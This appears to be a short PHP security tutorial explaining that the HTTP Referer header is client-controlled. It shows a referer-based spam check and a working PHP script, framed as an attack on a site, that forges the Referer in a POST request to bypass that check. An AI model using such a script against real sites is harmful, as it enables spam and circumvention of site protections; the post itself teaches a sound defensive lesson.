The http-Referer header is nothing more than the web address of the page that referred a browser to the actual page.
If you are trying to "protect" a file by making sure that the http-referer value (or any other browser passed variable) is your own website, you can be bypassed by this simple technique. You cannot trust any browser passed variables.

Suppose you have a form that requests the user to enter his user name and a comment. The form sends the user inputs to, let say formprocess.php. In the formprocess.php you check if the http-referer is your site to prevent from spam comments:

<?php
if ( eregi ( "www.mysite.com", $_SERVER['HTTP_REFERER'] ) )
{
    // do something
}
else
{
    echo "Nice try";
}
?>

The problem here is that you deal with a browser passed variable. An attacker can easily bypass your check by giving your site as referer.

Look at this script:

<?php
// the site we want to attack
$host = "www.mysite.com"; 
// the file we want to attack
$file = "formprocess.php";

// construct a header for our request

$hdrs = array( 'http' => array(

    'method' => "POST",

    'header'=> "accept-language: en\r\n" . 

        "Host: $host\r\n" .

        "Referer: http://$host\r\n" .  // Setting the http-referer

        "Content-Type: application/x-www-form-urlencoded\r\n" .
        "Content-Length: 33\r\n\r\n" .

        "username=mustap&comment=NOCOMMENT\r\n"

    )

);

// get the requested page from the server

// with our header as a request-header

$context = stream_context_create($hdrs);

$fp = fopen("http://" . $host . "/" . $file, 'r', false, $context);

fpassthru($fp);

fclose($fp);

?>

Create a formprocess.php file and try to get it with this script, you will see that the if statment in formprocess.php is useless.